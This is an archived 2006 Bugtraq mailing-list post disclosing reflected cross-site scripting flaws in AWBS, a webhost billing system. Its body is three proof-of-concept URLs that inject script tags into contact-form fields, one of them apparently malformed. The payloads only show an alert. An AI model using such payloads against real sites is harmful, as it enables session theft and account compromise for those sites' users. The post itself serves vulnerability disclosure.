XSS vulnerability on AWBS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS vulnerability on AWBS
From: newbinaryfile@xxxxxxxxx
Date: 29 Jul 2006 09:13:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

AWBS=Advanced Webhost Billing System

Exploit;

1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS 
Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

2.)http://[site 
adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS
 Vulnerability')%3B</script>&Message=1

3.)http://[site 
adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</textarea><script>alert('XSS
 Vulnerability')%3B</script>

.newbinaryfile

newbinaryfile@xxxxxxxxx

Prev by Date: Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities
Next by Date: RE: TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
Previous by thread: Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities
Next by thread: Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
Index(es):
- Date
- Thread